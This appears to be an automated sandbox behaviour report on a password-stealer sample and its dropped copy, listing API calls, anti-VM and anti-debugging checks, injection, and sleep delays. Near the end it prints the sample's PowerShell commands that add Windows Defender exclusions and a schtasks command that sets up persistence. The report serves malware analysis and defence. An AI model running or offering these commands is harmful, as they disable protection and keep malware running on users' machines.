            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 5584, type: MEMORYSTR
            Delayed program exit found
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040E18D Sleep,ExitProcess,16_2_0040E18D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: 83A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: 93A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: 9570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: A570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMemory allocated: 4960000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMemory allocated: 7860000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMemory allocated: 8860000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMemory allocated: 8A10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMemory allocated: 9A10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,16_2_004186FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6139Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6237Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeWindow / User API: threadDelayed 4752Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeWindow / User API: threadDelayed 5241Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeAPI coverage: 5.1 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe TID: 4704Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 6139 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1380Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1172Thread sleep count: 224 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe TID: 4244Thread sleep time: -14256000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe TID: 4244Thread sleep time: -15723000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe TID: 336Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,16_2_0041A01B
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,16_2_0040B28E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_0040838E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_004087A0
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,16_2_00407848
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004068CD FindFirstFileW,FindNextFileW,16_2_004068CD
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0044BA59 FindFirstFileExA,16_2_0044BA59
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,16_2_00417AAB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0040AC78
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,16_2_00406D28
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4039686667.000000000108A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_004327AE
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,16_2_0041A8DA
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004407B5 mov eax, dword ptr fs:[00000030h]16_2_004407B5
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,16_2_00410763
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_004327AE
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004328FC SetUnhandledExceptionFilter,16_2_004328FC
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_004398AC
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00432D5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMemory written: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe16_2_00410B5C
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004175E1 mouse_event,16_2_004175E1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"Jump to behavior
